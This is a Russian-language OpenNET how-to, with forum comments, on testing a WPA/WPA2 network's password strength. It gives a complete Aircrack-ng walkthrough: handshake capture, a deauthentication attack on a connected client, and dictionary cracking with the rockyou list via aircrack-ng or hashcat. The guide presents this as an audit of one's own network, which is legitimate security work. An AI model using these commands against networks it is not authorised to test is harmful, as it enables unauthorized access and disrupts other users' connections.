The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги ]

Проверка безопасности беспроводной сети WPA/WPA2 при помощи Aircrack-ng и Hashcat
Беспроводные сети на базе WPA/WPA2 не подвержены прямым методам атаки, но
злоумышленник может получить доступ к системам, на которых установлен
недостаточно надёжный пароль. Нижеприведённая инструкция позволяет проверить
свои системы на предмет стойкости к атаке по типовому словарю паролей.
Предлагается два метода восстановления пароля по перехваченному в трафике хэшу
- при помощи  Aircrack-ng и  Hashcat.

Устанавливаем Aircrack-ng:

   sudo apt-get install aircrack-ng

Определяем, поддерживает ли беспроводная карта режим мониторинга
(http://aircrack-ng.org/doku.php?id=compatible_cards - выбор поддерживаемых
плат), на выходе будет список сетевых интерфейсов для которых имеется подобная поддержка:

   airmon-ng

Переводим беспроводную плату в режим мониторинга:

   airmon-ng start wlan0

Отслеживаем все проходящие в эфире кадры на предмет идентификаторов
беспроводной сети (BSSID)  и используемых номеров каналов.

   airodump-ng mon0

   BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
   9C:5E:8A:C9:AB:C0  -81       19        0    0   6  54e  WPA2 CCMP   PSK  mywifi
   ...

Определив, что наша сеть имеет BSSID 9C:5E:8A:C9:AB:C0 и 6 канал, отслеживаем и
сохраняем в файл capture/-01.cap трафик пакетов, связанных с согласованием
нового соединения (ждём пока появится надпись "WPA handshake" и прерываем
перехват по ctrl-c):

   airodump-ng -c 6 --bssid 9C:5E:8A:C9:AB:C0 -w capture/ mon0

Для того, чтобы не ждать долго инициируем обрыв соединения у подключенных
клиентов (64:BC:0C:49:87:F7 - идентификатор клиента):

   airodump-ng -c 6 --bssid 9C:5E:8A:C9:AB:C0 mon0

   BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                 
   9C:5E:8A:C9:AB:C0  64:BC:0C:49:87:F7  -37    1e- 1e     4     6479  ASUS

   aireplay-ng -0 10 -a 9C:5E:8A:C9:AB:C0 -c 64:BC:0C:49:87:F7 mon0


Загружаем  словарь с примерами паролей (размер 134MB, около 14 млн типовых паролей):

   curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

Запускаем  aircrack-ng в режиме подбора хэша пароля по словарю (подбор
выполняется только на CPU, без привлечения GPU):

   aircrack-ng -a2 -b 9C:5E:8A:C9:AB:C0 -w rockyou.txt capture/-01.cap

Или используем для этого naive-hashcat (более эффективен при наличии доступа
к GPU), предварительно преобразовав cap-дамп в формат hccapx при помощи утилиты
cap2hccapx:

   cap2hccapx.bin capture/-01.cap capture/-01.hccapx
   HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
 
25.07.2017 , Источник: https://github.com/brannondorsey/wi...
Ключи: wpa, wpa2, wifi, aircrack-ng, hashcat / Лицензия: CC-BY
Раздел:    Корень / Администратору / Сетевая подсистема, маршрутизация / Wifi, настройка беспроводного доступа

Обсуждение [ Линейный режим | Показать все | RSS ]
 
  • 1.5, Аноним, 02:44, 27/07/2017 [ответить] [смотреть все]
  • +/
    Просмотрел что пользуются паролями по словарю, дальше не интересно Мои 25 не по... весь текст скрыт [показать]
     
     
  • 2.6, cmp, 06:28, 27/07/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Хе, а у меня 32 - мд5 какой-то лабуды, ноут проще проводом воткнуть и скопироват... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.7, PuskatelSheptunov, 00:03, 28/07/2017 [^] [ответить] [смотреть все]  
  • +/
    я параноик? у меня 63, или вы из соседних палат?
     
     
  • 4.23, sabakka, 23:44, 01/09/2017 [^] [ответить] [смотреть все]  
  • +/
    у меня 20см.
     
  • 4.25, Аноним, 13:18, 21/09/2017 [^] [ответить] [смотреть все]  
  • +/
    Мы с вами из одной палаты, коллега.
     
  • 4.27, Аноним, 13:30, 15/10/2017 [^] [ответить] [смотреть все]  
  • +/
    А у меня 64 символа...
     
  • 2.8, AdVv, 10:21, 28/07/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Главное WPS не выключайте ... весь текст скрыт [показать] [показать ветку]
     
  • 1.9, 123, 04:11, 31/07/2017 [ответить] [смотреть все]  
  • +/
    Ставим пароль 12345678 и лочим по макам устройства. Хоть и есть в словаре, но отсеим 95% хакеров-любителей.
     
     
  • 2.10, Аноним, 09:25, 02/08/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    ты идиот там видно при скане маки подключеных устройств, я могу твой мак вписат... весь текст скрыт [показать] [показать ветку]
     
  • 2.11, Аноним, 08:35, 04/08/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Если бы ты хоть что-то понимал в безопасности то догадался бы что сменить мак зн... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.12, Аноним, 21:55, 04/08/2017 [^] [ответить] [смотреть все]  
  • +/
    Речь о хакерах любителях же ну улыбнитесь хоть Вот ты будешь подменять маки ус... весь текст скрыт [показать]
     
     
  • 4.18, Аноним, 22:03, 21/08/2017 [^] [ответить] [смотреть все]  
  • +/
    Ты не поверишь - сканить будут днём, а подменять мак ночью.
     
  • 4.22, Аноним, 04:42, 28/08/2017 [^] [ответить] [смотреть все]  
  • +/
    Если сеть по другому не пускает - без вариантов Зависит требуется ли скрытность... весь текст скрыт [показать]
     
  • 1.13, Аноним, 21:57, 04/08/2017 [ответить] [смотреть все]  
  • +/
    Огласите время перебора среднего пароля из 10 символов на квантовом компьютере, ... весь текст скрыт [показать]
     
     
  • 2.14, Anonimous, 22:58, 07/08/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Можно в metarouter поднять openwrt/lede с radius и поставить ему ограничения.
     
     
  • 3.28, MatrixHasYou, 07:17, 10/11/2017 [^] [ответить] [смотреть все]  
  • +/
    Ага, а можно в вашей Виндовс поставить виртуалбокс и поднять там хакинтош чтобы ... весь текст скрыт [показать]
     
  • 2.15, Аноним, 03:27, 17/08/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Ну что, все еще не уснул?
     
     
  • 3.19, Аноним, 22:04, 21/08/2017 [^] [ответить] [смотреть все]  
  • +/
    Давайте не дадим спать болезному полгода Пусть он примет книгу рекордов ... весь текст скрыт [показать]
     
     
  • 4.26, ыпр, 18:21, 14/10/2017 [^] [ответить] [смотреть все]  
  • +/
    внутривенно? :)
     
  • 1.16, Kuromi, 01:20, 19/08/2017 [ответить] [смотреть все]  
  • +/
    "Переводим беспроводную плату в режим мониторинга:

       airmon-ng start wlan0"

    Ага, а что, любую карту так можно? раньше помнится были списки чипсетов которые такое позволяли...

     
     
  • 2.20, Аноним, 22:05, 21/08/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Любую из списка Ты новость вообще читал ... весь текст скрыт [показать] [показать ветку]
     
  • 1.17, лютый жабист__, 08:33, 20/08/2017 [ответить] [смотреть все]  
  • –1 +/
    Спасибо за статью! Не знал, что так всё просто.
     
     
  • 2.21, Аноним, 22:51, 23/08/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    а слабо было iwconfig wlan0 mode Monitor попробовать Тут нелинуксоиды вопрос... весь текст скрыт [показать] [показать ветку]
     
  • 2.24, Аноним, 18:35, 10/09/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    > Не знал, что так всё просто.

    Знал, что так всё не просто.

     

    Ваш комментарий
    Имя:         
    E-Mail:      
    Заголовок:
    Текст:



      Закладки на сайте
      Проследить за страницей
    Created 1996-2017 by Maxim Chirkov  
    ДобавитьРекламаВебмастеруГИД  
    Hosting by Ihor